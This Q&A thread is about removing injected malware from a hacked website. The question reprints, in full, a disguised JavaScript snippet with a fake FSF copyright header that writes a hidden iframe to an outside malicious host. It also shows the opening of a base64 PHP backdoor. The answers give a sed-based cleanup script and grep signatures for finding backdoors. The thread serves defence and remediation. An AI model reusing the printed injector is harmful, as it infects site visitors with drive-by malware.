# FIX: Remove fsf.org HomeMader/ActerMoto/lusikrators javascript malware

Tags: javascript, php, cookies, malware

Two days ago I get this script on the top of all my javascript files on my sites:

```
/*
Copyright (C) 2007 Free Software Foundation, Inc. fsf.org
*/
function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://milkatures.getonnow.net/briopo;osiue16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date).getTime()+64*60*60*1e3);document.cookie="lastshow=1; path=/; expires="+r.toUTCString()}}HomeMader()
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
*/
```

After some research i've got the next tips to remove the javascript/php malware from your site.

1. First search in all your files for "eval(base64_decode(", you will find a file named xm.php (size: 43KB). Maybe its has another name on your server but it's contains a very loc base64 code in a eval function (remove the file with this code, for more info over the file see: http://aw-snap.info/articles/backdoor-examples.php):

> eval(base64_decode("Ly80ZDFlZWUyNDNjNTE4ZjFjN2FjNjE4MzdmMDQ3ZjlkYmFhZWE...

2. Run this script to remove all the javascript codes from your files ( more info about the script see: http://blog.lux-medien.com/2014/09/how-to-fix-actermoto-and-its-edited-javascript-files/ )

(replace: REPLACE_WITH_A_UNIQUE_NAME_FROM_THE_COOKIE_SCRIPT with in this case for example: HomeMader)

```
#!/bin/bash
# This script will fix (or try to fix) infected stuff on your server.
# by Andreas Zeller of lux-medien.com - 15.09.2014

NUMBER_OF_LINES=4 ## This is the number of lines that are infected at the top of the file. Notice that this ONLY works if there is a number of lines to be removed on top of the file. Otherwise this script will break stuff.
IDENTIFYING_STRING="REPLACE_WITH_A_UNIQUE_NAME_FROM_THE_COOKIE_SCRIPT" ## This is the string that will identify the infected file. Most scripts add some sort of website or some other UNIQUE string to it. Adjust to your needs.

echo "Trying to fix your shit. Use at your own risk."
malicious_list=`grep --include=\*.js -rnl . -e "$IDENTIFYING_STRING"`
if [ -z "$malicious_list" ]
    then
        echo "Nothing found. You seem to be clean."
    else
        echo "Found `echo "$malicious_list" | wc -l` malicious files..."
fi

for filename in $malicious_list
do
echo "Fixing $filename"
    if [ -f $filename ]
    then
        sed -i -e 1,"$NUMBER_OF_LINES"d $filename
    else
        echo "File $filename not found"
    fi
done
exit
```

Unfortently I dont know how the xm.php file is added to the server. But I hope this help other people to fix this issue. If you know more about this, how its add to the server? Please let me know!

Comment: There's no way to say how it got onto your server. There might be an issue in your code; there might be an issue with the server configuration; if it's a shared server, it could be because someone else's server got compromised and the configuration meant that your server was also accessible. Pretty much all you can do is restore from your last known good backup, and trawl through the logs to see if you can find anything suspicious.

Comment: What you see is one implementation of an entire *class* of malware. Bots search for well-known security holes, and inject backdoors for spamming or drive-by infections. Your approach is (a) naive and (b) gives a false sense of security. Cleaning malware is not done by some simple search'n'replace. If it were, Windows users could continue using their Norton AV from 2003.

Comment: And, by the way fsf.org is the website of the Free Software Foundation. I *highly* doubt that they're authoring malware. RMS is definitely crazy, but not evil crazy.

Comment: @lxg Yes I understand this is not from the FSF, but its only a fake name that they used. Yesterday I saw this link: [link](http://stackoverflow.com/questions/25846267/unknown-javascript-files-edit). But it was closed, now I found something that hopefully fix the issue. Also I think the script is added by an old wordpress plugin or something like that.

Comment: This isn't written in the form of a question, and, in any case, it's not strictly speaking a programming problem. (It's more of a system administration thing.)

Answer (score 0, accepted):

It's pointless cleaning up your javascript files until you find the php backdoor that is making this happen.
Believe me, I laboured over this for weeks!

You need to do a grep search on your entire server for the following strings...

```
'eval(gzinflate(base64_decode('
```

and

```
'eval(gzuncompress(base64_decode('
```

and

```
'if(!empty($_COOKIE['
```

it should return randomly named .php files. 
You must remove these since this is the backdoor which is editing your javascript files (triggered remotely by direct URL from a hacker Zombie machine most probably). Especially the files containing

```
`'if(!empty($_COOKIE['.`
```

Comment: That's right, I remove the bad script by searching on "eval(", "base64_decode" and "filesman". IWith Notepad++ it's easy to search in the code of all your files. Old Wordpress plugins is in my case the cause of the bad scripts.

Answer (score 2):

I'm the guy who wrote the above script. It's not only a Wordpress issue. Here's how you look for malicious code:

- use find (find . -iname *.php -mtime -3 ...) or something like that to find files that have been changed recently
- check those files for malicious code
- just like the person above said, ISOLATE something like base64... that will identify those PHP files uniquely and then use the grep function from the script posted to find all of the affected PHP files.

It is VERY likely that you will only find ONE installation that has modified PHP files. You're going to have to find what is wrong with that installation. Check the timestamps on the files and check the according error logs for this (apache?) instance.

If you also have a joomla installation, do yourself a favor and switch to something more 'professional'. We offered web-hosting in the past and it's now policy to not ALLOW joomla installations.

Wordpress is not that bad, just try not to overload it with plugins. The more plugins, the more likely it is that you catch something :)

Andreas

Comment: Thanks for this, that was really helpful.
My wordpress site was compromised, and everytime I did a fresh install the malicious javascript would instantly get thrown back on the server. A combination of the above script and a grep -l -R "__mestore" . seemed to fix the issue.